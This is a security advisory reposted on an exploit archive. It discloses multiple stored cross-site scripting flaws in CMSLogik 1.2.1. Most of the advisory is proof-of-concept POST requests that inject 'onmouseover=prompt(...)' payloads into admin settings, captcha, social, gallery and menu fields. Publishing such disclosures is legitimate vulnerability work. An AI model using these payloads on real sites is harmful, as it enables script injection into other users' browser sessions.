CMSLogik 1.2.1 Cross Site Scripting

CMSLogik 1.2.1 Cross Site Scripting: Posted Apr 15, 2013; Authored by LiquidWorm | Site zeroscience.mk; CMSLogik version 1.2.1 suffers from multiple persistent cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 0d689e042dfbcc06d7598ea63bfdfc89986778efbd29a42b5b292eb8d35e93cc; Download | Favorite | View

CMSLogik 1.2.1 Cross Site Scripting


CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities


Vendor: ThemeLogik
Product web page: http://www.themelogik.com/cmslogik
Affected version: 1.2.1 and 1.2.0

Summary: CMSLogik is built on a solid & lightweight framework
called CodeIgniter, and design powered by Bootstrap. This
combination allows for greater security, extensive flexibility,
and ease of use. You can use CMSLogik for almost any niche that
your project might fall into.

Desc: CMSLogik suffers from multiple stored XSS vulnerabilities
when parsing user input to several parameters via POST method.
Attackers can exploit these weaknesses to execute arbitrary HTML
and script code in a user's browser session.

Tested on: Apache/2.2.22
           PHP/5.3.15


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2013-5136
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5136.php


05.04.2013

--

==============================================================================

POST http://localhost/cmslogik/admin/settings HTTP/1.1

admin_email  "onmouseover=prompt("XSS1")>
default_level  2
default_page  1
default_url  http://themelogik.com/cmslogik/
email_activate  0
header_title  "onmouseover=prompt("XSS2")>
login  1
registration  1
site_title  "onmouseover=prompt("XSS3")>
update_settings  Update Settings
welcome_email  0

==============================================================================

POST http://localhost/cmslogik/admin/captcha_settings HTTP/1.1

captcha_settings  Update
recaptcha_private  "onmouseover=prompt("XSS4")>
recaptcha_public  "onmouseover=prompt("XSS5")>

==============================================================================

POST http://localhost/cmslogik/admin/social_settings HTTP/1.1

fb_appid  "onmouseover=prompt("XSS6")>
fb_secret  "onmouseover=prompt("XSS7")>
social_settings  Update
tw_consumer_key  "onmouseover=prompt("XSS8")>
tw_consumer_secret  "onmouseover=prompt("XSS9")>

==============================================================================

POST http://localhost/cmslogik/admin/gallery/save_item_settings HTTP/1.1

imgid  76
long  test
short  test
slug  "onmouseover=prompt("XSS10")>
status  live
title  test

==============================================================================

POST http://localhost/cmslogik/admin/edit_menu_item_ajax HTTP/1.1

item_link  "onmouseover=prompt("XSS11")>
item_name  test
item_order  0
mid  9

==============================================================================

Top Authors In Last 30 Days

Red Hat 226 files
Ubuntu 86 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,374)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,287)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,660)
UNIX (9,426)
UnixWare (187)
Windows (6,666)
Other

CMSLogik 1.2.1 Cross Site Scripting

CMSLogik 1.2.1 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CMSLogik 1.2.1 Cross Site Scripting

Share This

CMSLogik 1.2.1 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems